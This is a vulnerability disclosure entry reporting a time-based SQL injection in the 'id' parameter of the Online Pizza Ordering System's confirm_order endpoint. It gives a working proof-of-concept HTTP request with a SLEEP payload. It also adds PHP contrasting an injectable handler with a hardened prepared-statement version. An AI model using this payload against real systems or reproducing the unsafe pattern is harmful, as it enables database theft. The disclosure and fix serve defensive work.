| Title | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
|---|---|

Description:

Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391

Tested On:
Ubuntu Server 22.04.3 LTS

Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order

Request:

```http
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1
```

Affected Parameter:
id

Proof of Concept:

```http
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
```

Impact:
An SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.

Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.

| User | simon.davis8080 (UID 54983) |
|---|---|
| Submitted | 05/10/2023 10:30 (3 years ago) |
| Moderated | 05/10/2023 12:01 (2 hours later) |
| Status | Accepted |
| VulDB Entry | 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID SQL injection] |
| Points | 17 |
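The submission describes the root cause as improper input sanitization of the `id` parameter but does not show the handler's source. The following is an added example, not code from the Online Pizza Ordering System project: it places the assumed shape of such a handler (request value concatenated into the SQL string) beside a hardened version that validates the parameter as an integer and binds it through a PDO prepared statement. The table and column names (`orders`, `id`, `status`), the `confirm_order_*` function names and the connection settings are assumptions made for illustration.

```php
<?php
// Added example; not the project's own code. The real handler behind
// ajax.php?action=confirm_order is not shown on the page, so the unsafe
// function below is the *assumed* typical pattern, and the table/column
// names (orders, id, status) are assumptions.

/**
 * UNSAFE (assumed pattern): the POST value is spliced into the statement.
 * A value such as "1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)" is
 * then executed as SQL, which is why the time-based probe in the submission
 * delays the response instead of being rejected.
 */
function confirm_order_unsafe(PDO $pdo, array $post): bool
{
    $sql = "UPDATE orders SET status = 1 WHERE id = " . $post['id'];
    return $pdo->exec($sql) !== false;
}

/**
 * HARDENED: validate the type first, then bind the value as data.
 *  - FILTER_VALIDATE_INT with min_range 1 returns false for anything that
 *    is not a plain positive integer, so "1 AND (...)" never reaches MySQL.
 *  - The prepared statement binds :id as PDO::PARAM_INT, so even if the
 *    validation were loosened later the value could not change the query's
 *    structure.
 *  - A rejected value is logged; repeated 400s on this action from one
 *    session are a useful detection signal for injection probing.
 */
function confirm_order_safe(PDO $pdo, array $post): bool
{
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($id === false) {
        http_response_code(400);
        error_log('confirm_order: rejected non-integer id: '
            . substr((string)($post['id'] ?? ''), 0, 80));
        return false;
    }

    $stmt = $pdo->prepare('UPDATE orders SET status = 1 WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// Assumed dispatch for ajax.php (the original application's routing is not
// shown on the page). Emulated prepares are disabled so MySQL itself does
// the parameter binding rather than the PDO driver interpolating strings.
if (PHP_SAPI !== 'cli' && ($_GET['action'] ?? '') === 'confirm_order') {
    $pdo = new PDO(
        'mysql:host=localhost;dbname=opos_db;charset=utf8mb4', // assumed DSN
        'opos_user',                                           // assumed
        'change-me',                                           // assumed
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
    header('Content-Type: application/json');
    echo json_encode(['ok' => confirm_order_safe($pdo, $_POST)]);
}
```

The integer validation is the cheap, visible fix; the prepared statement is the one that holds even when someone later relaxes the validation or reuses the query with a different parameter. Both belong in the hardened handler.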